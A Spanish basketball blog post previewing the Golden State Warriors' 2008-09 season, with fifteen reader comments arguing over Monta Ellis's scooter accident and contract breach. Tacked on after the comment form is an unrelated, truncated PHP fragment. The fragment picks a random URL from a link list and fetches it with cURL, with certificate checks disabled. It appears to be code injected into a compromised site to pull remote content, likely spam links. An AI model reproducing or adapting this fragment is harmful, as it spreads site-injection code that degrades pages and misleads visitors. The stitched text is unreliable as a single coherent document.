Golden State Warriors: La dura realidad

11 de October de 2008 por MagicJohnson32

montaellisVaya panorama. Ganas 48 partidos, suficiente para ser 4º en la otra Conferencia pero insuficiente para entrar en Playoffs en la tuya; llega la post temporada y tu jugador estrella renuncia a su último año de contrato para marcharse a los Clippers; los mejores agentes libres disponibles -léase Elton Brand- rechazan tus ofertas y sólo sobrepagando consigues a un buen jugador que difícilmente marcará diferencias; y, a continuación, el que iba a ser tu referente y principal recurso ofensivo, miente tratando de ocultar que la lesión que le mantendrá de baja alrededor de dos meses se la había producido haciendo algo que tenía prohibido por contrato. ¿Recuerdan cuando en la Bahía de Oackland creían? Mucha fe hay que tener para pensar en los Warriors como equipo de Playoffs en la temporada que está en ciernes. Sin Baron Davis, que abandona el frenético barco de Don Nelson buscando tal vez aguas más calmadas junto a Mike Dunleavy, y hasta fin de año sin Monta Ellis, lesionado en accidente de moto, los refuerzos realizados se presentan como insuficientes. ¿O no?

cmaggetteEntre las novedades destaca Corey Maggette, que hizo el trayecto inverso al de B-Diddy a cambio de algo más de 50 millones de dólares, mucho dinero y por tanto mucha responsabilidad para un jugador que debería de encontrarse cómodo en el juego desbocado de los Warriors pero que ha de traducir sus estadísticas, excelentes, en resultados para su equipo. Ante la baja de Ellis, Maggette será el referente exterior junto a Stephen Jackson, reconvertido en ciudadano modelo y líder del vestuario del Oracle Arena. Pero Captain Jackson ya ha dicho abiertamente que espera una ampliación al alza del contrato que le proporcionará 7,5 millones de dólares por cada una de las próximas dos campañas, sensiblemente por debajo de lo que cobrarán Ellis (11 millones por seis temporadas), Harrington (9,5 millones por dos temporadas), Biedrins (9 millones por seis temporadas) y Maggette (que ha firmado por 5 temporadas y empezará cobrando 8,6 millones para acabar en 11,7). Jackson quiere un salario acorde con su status y la pasada temporada le dio motivos para considerarse realmente importante. Si las negociaciones contractuales no le afectan, volverá a serlo.

También ha de ser fundamental Andris Biedrins, con el que se especuló que se uniría a la migración europea pero que finalmente renovó. El letón de 22 años, un jugador extremadamente eficaz y que promedió 10.5 puntos y 9.8 rebotes en apenas 27 minutos de juego, volverá a ser el 5 titular y de él se espera que progrese y se haga notar más en defensa. A Biedrins le convendría en este sentido que Nelson redujese las revoluciones, aunque a estas alturas del partido es poco probable que esto ocurra. El veteranísimo técnico volverá a recurrir al small-ball con Al Harrington (un jugador con medias casi idénticas en triples intentados biedrinsjaxboozy rebotes) como 4 titular. Las alternativas interiores serán Brandan Wright, al que Nellie apenas dio oportunidades en su año rookie, y Ronny Turiaf. El francés era uno de los favoritos del público de los Lakers y seguro que no tarda en ganarse al del Oracle. Su intensidad no vendrá mal a un equipo con una irremediable tendencia a descuidar las responsabilidades defensivas, pero en ningún caso valdrá los cerca de 17 millones que los Warriors le pagarán al ex Gonzaga.

Más intrigante es qué podrá aportar Marcus Williams. Tras sus fallidas dos temporadas en los Nets, el prometedor base se halla ante la ocasión para destaparse. Hasta el regreso de Ellis, Marcus habría de ser el base titular. La competencia para el puesto no es precisamente dura: CJ Watson, base-escolta de segundo año, y Dan Dickau, que cambia así por octava vez de equipo en siete temporadas como profesional. La rotación en la posición de escolta la cubren Kelenna Azubuike, renovado este verano, y Marco Belinelli. Ambos han demostrado buenas maneras siempre que han contado con oportunidades, aunque en el caso del italiano eso sucedió casi exclusivamente en pretemporada. Las marchas de Pietrus a Orlando y Matt Barnes a Phoenix deben ayudar a Azubuike y Belinelli a ganar minutos de juego, mientras que en las rotaciones de la posición de 3-4 puede entrar Anthony Randolph, el zurdo ex de LSU elegido en primera ronda del pasado draft.

Muy bien necesitan los Warriors que les salgan las cosas esta temporada para tan siquiera luchar por los Playoffs. El tiempo que pasarán sin Monta Ellis puede dejar a los de la Bahía, dado el grado de competitividad del Oeste, demasiado descolgados como para recuperarse cuando vuelva el velocísimo jugador de cuarto año. Las posibilidades pasan por tanto por el crecimiento de los jóvenes, especialmente Andris Biedrins, y por una buena adaptación de Maggette. Con todo, suponiendo que Biedrins y Marcus Williams mejoran, que Maggette se adapta perfectamente y que Jackson no discute con Chris Mullin, lo más probable es que ni así sea suficiente.

Quinteto titular: Marcus Williams (Monta Ellis), Stephen Jackson, Corey Maggette, Al Harrington y Andris Biedrins

Sexto hombre: Kelenna Azubuike

Pronóstico: Fuera de Playoffs

Comenta

15 comentarios a esta entrada

  1. Jabho dice:
    #1

    Pues si, dura realidad. Ni con Monta Ellis son equipo de PO, así que sin él.

    El juego rápido está muy bien, pero si tienes a Baron, Tim Hardaway o a Nash. Con Marcus Williams, jugador con talento pero tirando a lento, seguro que mas que rápido parece alocado.

    En fin, que pinta regularcete. Una pena. Si escogiera, por error claro, algún equipo del Oeste sería posiblemente los Belivers.

      Citar

  2. TheDeerHunter dice:
    #2

    Bueno, está claro que en el oeste lo tenían jodido para clasificarse para playoffs incluso con Ellis sano…

    Pero el cuerpo que se les debe de haber quedado después de haber apostado por el figura este como jugador franquicia para los próximos años y que a las primeras de cambio te la juegue de esta manera…

    Lo cierto es que muchas veces, a la hora de disfrutar de esta liga tendemos a mitificar determinados aspectos de ella y a ignorar los defectos que tiene, como puede ser el nivel intelectual de determinados elementos que por ella pululan… en este caso, el amigo Monta, que lo de tirar 3 millones de dólares haciendo el capullo es corto castigo para la hazaña cometida.
    El muy imbécil se jugó toda su carrera… lo que no tengo claro es lo que hubiera pasado con el pastizal que firmó de haberse dado el caso peor. Suerte ha tenido.

    En cualquier caso yo a este tipo ya no le ponía a liderar ni a un equipo de corte y confección.

    Los creyentes ya pueden ponerse a pensar en otra reconstrucción.

      Citar

  3. Txusma dice:
    #3

    Deer, te leo y me da la impresion que Ellis ha practicado el puenting con maroma de barco o que se ha ido a esquiar en camiseta de manga corta y sin cascos ni guantes. Ellis tuvo el accidente montado en una scotter, no en una 500cc y nadie dice que fuera sin casco ni haciendo el cabra. El problema es que, por contrato, Ellis no podia haberse subido en una moto pero mi pregunta es: Realmente es licito le prohibirle a un jugador montar en una scotter por haberle firmado un contrato de la cantidad de dinero q sea? Se les prohibe montar tb en determinados coches? Los coches no tienen accidentes? Ponemos una clausula q diga q el jugador ha de ir envuelto en poriespan las 24 horas al día?
    Para mi montar en una scotter no significa poner en riesgo su carrera profesional ni que Ellis sea un autentico descerebrado y mucho menos un capullo o un imbecil. Si tu lo consideras asi por el simple hecho de estar prohibido en el contrato vale, pero no creoq consideres montar en una scotter una actividad “hiperpeligrosa” en si.

      Citar

  4. TheDeerHunter dice:
    #4

    Txusma… por supuesto que una motocicleta sea del tipo que sea es más peligrosa por definición que un coche… precísamente porque el chasis de una moto es tu propio cuerpo y los golpes, por muy pequeños que sean dañan el cuerpo antes que nada. En el caso de un jugador en el que se invierten millones de dólares la cosa no es precísamente un broma… porque el riesgo lo asume fundamentalmente la empresa. A ninguna empresa del mundo le viene bien tirar a la basura millones de dólares a causa de las imprudencias que cometa un niñato.

    En realidad, efectivamente no conozco hasta que punto Ellis fue imprudente en ese sentido… pero el mero hecho de infringir deliberadamente una claúsula de un contrato tan sumamente importante para él y después mentir de esa manera y que le pillen no dice nada bueno de su inteligencia. Y sí, a mí sí me parece un descerebrado, capullo, imbecil por haberlo hecho y quizás algunas cosas más. De momento la jugada ya le sale por un pellizco de 3 millones de dólares que ni tú ni yo ganamos todos los días (supongo) y podría haber sido mucho peor. En realidad ha tenido mucha suerte.
    Lo de que se ha jugado su carrera profesional no me lo he inventado yo. Es un hecho. Y en algún momento se ha llegado a especular conque no podría volver a jugar al baloncesto profesiona. Menuda gamberradita más graciosa… qué chispa!!!

    Ahora, si quieres iniciar un debate de lo que un jugador debería poder o no hacer me temo que no soy la persona más cualificada sobre el tema… pero supongo que quien haya valorado la necesidad de incluir precísamente esa clausula en el contrato sí lo estará. A los efectos de Monta Ellis, habiendo firmado esas condiciones para él deberían ser algo así como la biblia en verso. En el momento en el que dos partes firman un acuerdo así por supuesto que la prohibición es lícita… que yo sepa nadie le puso una pistola para aceptarla. No estamos hablando de un canterano de la masía, precisamente….

      Citar

  5. Viva_Dirk dice:
    #5

    En mi opinión Ellis es un jugadorazo, que sea mas o menos inteligente, un imbecil o un descerebrado me es exactamente igual. El ha tenido un accidente de tráfico, pero no creo que en el contrato de Stephen Jackson diga que puede meterse en una reyerta con pistolas de por medio, que a Telfair se le permita llevar pistolas en el avión del equipo, que a muuuuuuuuuuchos jugadores de la liga se les permita fumar marihuana o inflingir otro tipo de leyes, porque tienen antecedentes.

    Deer esta demonizando a alguien por el simple hecho de montar en moto cuando lo prohibia en su contrato, cuando una parte de los jugadores de la liga hacen cosas que estan prohibidas por su contrato o incluso por la ley, lo que podria dejarles sin carrera deportiva y a su ‘empresa’ bien jodida.

      Citar

  6. TheDeerHunter dice:
    #6

    Ehm… vayamos por partes
    -Si personalizo este suceso en Ellis, es porque viene a colación del artículo de Golden State… te aseguro que me parece igual de mal siempre… en ocasiones incluso peor (léase Radmanovic) Sin embargo, te reconozco que este caso en concreto me parece especialmente sangrante pero te puedo asegurar que a mí personalmente este chico no me ha hecho nada. No le tengo especial manía… no entiendo porqué piensas lo contrario.
    -Ellis es un jugadorazo. No lo pongo en duda. Su profesionalidad en cambio es objetivamente penosa teniendo en cuenta que ha tratado públicamente de defraudar a la empresa que le paga. Sinceramente no sé cómo se puede justificar esa actitud… estoy seguro que los seguidores y directivos de los Warriors no estarán muy contentos con él independientemente que piensen que sea un jugadorazo o no.
    -No voy a entrar a justificar otras actitudes.Recordemos que a esta gente les paga exclusivamente por jugar (y no poco, por cierto) pero que cuando no pueden hacerlo generalmente les siguen pagando. Supongo que esa clausula del contrato no existiría si, llegado el caso que el jugador se viera imposibilitado de hacer su trabajo por motivos externos a lo que le pagan no sólo dejara de cobrar sino que indemnizara a su equipo… más que nada por el trastorno que supone con respecto a la planificación deportiva de todos.
    -Tampoco conozco tan al detalle los otros casos que mencionas. En EEUU por ejemplo, llevar armas no es delito. Desconozco en qué situación queda un contrato cuando una de las partes muere en un tiroteo, le meten en la cárcel o deja de jugar por el programa anti-drogas. Estoy casi seguro que, por la cuenta que les trae, son casos que tienen bien tipificados… con su correspondiente cláusula me temo.
    A colación de esto ya puede comprobarse lo especialmente grave que ha sido este caso por la trascendencia informativa que ha tenido. Por algo será.

      Citar

  7. Txusma dice:
    #7

    No creo que debamos juzgar la gravedad de un caso/suceso por la trascendencia informativa que tiene sino que hemos de ser lo suficientemente objetivos para valorarlo nosotros mismos. Tampoco me vale que me digas q Ellis ha puesto en peligro su carrera deportiva pq lo ha dicho la prensa, porque yo de los medios de comunicación me creo solo la mitad y la otra mitad la pongo siempre en duda.
    A partir de aqui, estoy de acuerdo contigo en que la actitud de Ellis no ha sido en absoluto profesional, q las clausulas de las contratos estan para respetarlas y que otros jugadores hagan cosas parecidas no vale como atenuante, pero lo q me sigue sorprendiendo es la virulencia con la que atacas al de GSW. En realidad me da igual, pero cuando veo que el delito de Ellis ha sido ir en una scotter (no estar implicado en una reyerta…), te releo y no acabo de creerme que hablemos de lo mismo.
    Y bueno, si despues de esto tu no quieres a Ellis para que encabece tu franquicia por mi perfecto, ya encabezará la mia. Y es q no olvidemos que el chico tiene 21 años y q me da q perder 3.000.000 de dólares le va a hacer recapacitar bastante. (otro tema es lo de firmarle un contrato de semejante dinero a un chaval de 21 años pero ahi las franquicias de la NBA ya evaluaran los riesgos digo yo)

      Citar

  8. MagicJohnson32 dice:
    #8

    A mí lo más grave no me parece el accidente. Eso es serio, y más con el contrato de 60 kilos recién firmado. Pero lo de mentir a la franquicia es inexcusable, como ya lo fue en el caso de Radmanovic. Tampoco creo que haya que demonizarlo: ha cometido un error (dos en realidad) y lo pagará. Ellis es un jugador extraordinario y no es el primero ni el segundo (ni el 357º) en cagarla.

      Citar

  9. TheDeerHunter dice:
    #9

    Venga con demonizar… que yo sepa no he pedido todavía que lo cuelguen de los testículos desde donde cuelgan las camisetas retiradas… cómo estáis de susceptibles.

    Tampoco lo he juzgado por lo que diga la prensa sólo es un detalle que indica la relevancia que ha tenido por unos motivos muy concretos, por cierto. No ha sido un caso cualquiera.
    Eso sí, insisto en que se ha jugado su carrera diga lo que diga la prensa… y no ha sido tampoco el primero ni el último.
    Al respecto una aclaración más. La cláusula en cuestión contempla cualquier actividad que ponga en riesgo la integridad física del jugador y aquí se incluye específicamente no poder NI CONDUCIR NI MONTAR en motocicletas o ciclomotores. Es un detalle a tener en cuenta.

    Más allá de eso, hay actos más graves, por supuesto… la virulencia con que le ataco tampoco llega a más de que si tuviera 66 millones de dólares no los apostaría por él seguro.
    ¿otra oportunidad??? seguro que la tiene… aunque me permito el lujo de opinar que bajo mi punto de vista el castigo ha sido demasiado indulgente, porque las pérdidas económicas para el equipo y el daño a la imagen son mayores a 3.000.000. $
    Y si perder 3 kilos por darse una vueltecilla con una “amoto” no es de descerebrados vosotros me diréis…

      Citar

  10. portu dice:
    #10

    El tema de la moto es más complicado de lo q parece, pq ya sea scooter o una 900, como bien dice Deer, el chasis es tu cuerpo… aún recuerdo una de mis últimas guardias en Lisboa con un chaval q llevaba una scooter de Pizza Hut y q tras un leve choque acabó perdiendo el pie…

      Citar

  11. Viva_Dirk dice:
    #11

    Perder 3 kilos por darse una vuelta con una moto es de descerebrados fijo, si lo que quieres decir es que en la NBA hay un buen puñado de ellos no va a quitarte la razón nadie.

    Si con esto quieres decir que Ellis es peor jugador de lo que era antes de darse esa vuelta con la moto(no por la lesión, sino por su capacidad mental), pues no creo que vayas a cambiar la opinión de nadie que piense que Ellis es un jugador ofensivamente letal.

      Citar

  12. TheDeerHunter dice:
    #12

    A lo primero… efectivamente esa es una de las cosas que digo, no descubro con eso el mundo lo sé. Añado que Ellis ha entrado con fuerza en el top-lerdos.

    Con respecto a lo segundo. Sabes muy bien que la diferencia entre un gran jugador y un gran jugador inteligente es mucha… y SÍ, diría que esto ha cambiado la opinión de muchos acerca de Ellis. Al menos la de uno. (La mía y sospecho que la de cualquier directivo-aficionado-simpatizante de los Warriors)

    PD: Durante estos dos o tres meses que se va a tirar tocándose las narices será letal, como mucho, para las cucharachas de su casa… y ni eso, que serán más rápidas que él.

      Citar

  13. Viva_Dirk dice:
    #13

    En cuanto reconozcas que le has cogido manía, se acaba la discusión :p

      Citar

  14. Txusma dice:
    #14

    Pero una mania especialmente cruenta… 😀

      Citar

  15. TheDeerHunter dice:
    #15

    La manía se la pillé a Radmanovic… a éste para nada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>